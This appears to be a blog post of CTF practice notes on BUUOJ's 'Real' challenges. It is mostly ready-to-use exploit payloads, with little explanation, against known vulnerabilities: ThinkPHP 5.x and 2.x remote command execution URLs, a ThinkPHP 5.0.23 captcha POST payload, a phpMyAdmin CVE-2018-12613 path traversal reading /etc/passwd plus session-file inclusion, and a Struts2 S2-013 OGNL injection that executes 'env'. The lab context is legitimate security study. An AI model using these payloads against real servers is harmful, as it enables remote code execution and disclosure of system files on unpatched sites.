zoukankan      html  css  js  c++  java
  • BUU_Real_刷题记录

    [ThinkPHP]5-Rce

    v5.0.23及v5.1.31以下版本远程命令执行漏洞

    http://node3.buuoj.cn:29858/index.php
    ?s=index/thinkapp/invokefunction
    &function=call_user_func_array
    &vars[0]=system
    &vars[1][]=whoami

     获得flag

    http://node3.buuoj.cn:26215/index.php?s=index/thinkapp/invokefunction
    &function=call_user_func_array
    &vars[0]=phpinfo
    &vars[1][]=-1

    Thinkphp5 RCE总结

    [ThinkPHP]5.0.23-Rce

    POST /index.php?s=captcha HTTP/1.1
    Host: node3.buuoj.cn:25184
    Content-Length: 76
    Pragma: no-cache
    Cache-Control: no-cache
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36
    Origin: http://node3.buuoj.cn:25184
    Content-Type: application/x-www-form-urlencoded
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://node3.buuoj.cn:25184/index.php?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][0]=ls
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
    Connection: close
    
    _method=__construct&filter[]=system&server[REQUEST_METHOD]=php -i&method=get

    [ThinkPHP]2-Rce

    http://node3.buuoj.cn:28705/index.php/Index/index/name/${@phpinfo()}
    
    http://node3.buuoj.cn:28705/index.php/Index/index/name/${@system(pwd)}

    Thinkphp2.1漏洞利用

    ThinkPHP系列漏洞之ThinkPHP 2.x 任意代码执行

    [PHPMYADMIN]CVE-2018-12613

    http://node3.buuoj.cn:28623/index.php?target=sql.php%253F/../../../../../../etc/passwd

    phpadmin执行 select “<?php phpinfo();?>”

    GET /index.php?target=tbl_sql.php%253F/../../../../../../../../../../../../../../tmp/sess_672a9aa66b158e4b49d9c1892d0a30c8 HTTP/1.1
    Host: node3.buuoj.cn:28623
    Pragma: no-cache
    Cache-Control: no-cache
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
    Cookie: pma_lang=zh_CN; phpMyAdmin=672a9aa66b158e4b49d9c1892d0a30c8; auto_saved_sql_sort=
    Connection: close

     phpMyAdmin 4.8.x LFI to RCE

    [struts2]s2-013

    http://node3.buuoj.cn:26757/link.action
    ?a=%24%7B%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec('env').getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B50000%5D%2C%23c.read(%23d)%2C%23out%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23out.println('dbapp%3D'%2Bnew%20java.lang.String(%23d))%2C%23out.close()%7D

    Struts2再爆远程代码执行漏洞

    env: 用于显示系统中已存在的环境变量,以及在定义的环境中执行指令。变量定义:定义在新的环境中变量,定义多个变量定义用空格隔开。格式为“变量名=值”;

    [struts2]s2-045

  • 相关阅读:
    Roce ofed 环境搭建与测试
    Ubuntu 1804 搭建NFS服务器
    Redhat 8.0.0 安装与网络配置
    Centos 8.1 安装与网络配置
    SUSE 15.1 系统安装
    VSpare ESXi 7.0 基本使用(模板、iso、SRIOV)
    VSpare ESXi 7.0 服务器安装
    open SUSE leap 15.1 安装图解
    KVM虚拟机网卡连接网桥
    GitHub Action一键部署配置,值得拥有
  • 原文地址:https://www.cnblogs.com/chrysanthemum/p/13681983.html
Copyright © 2011-2022 走看看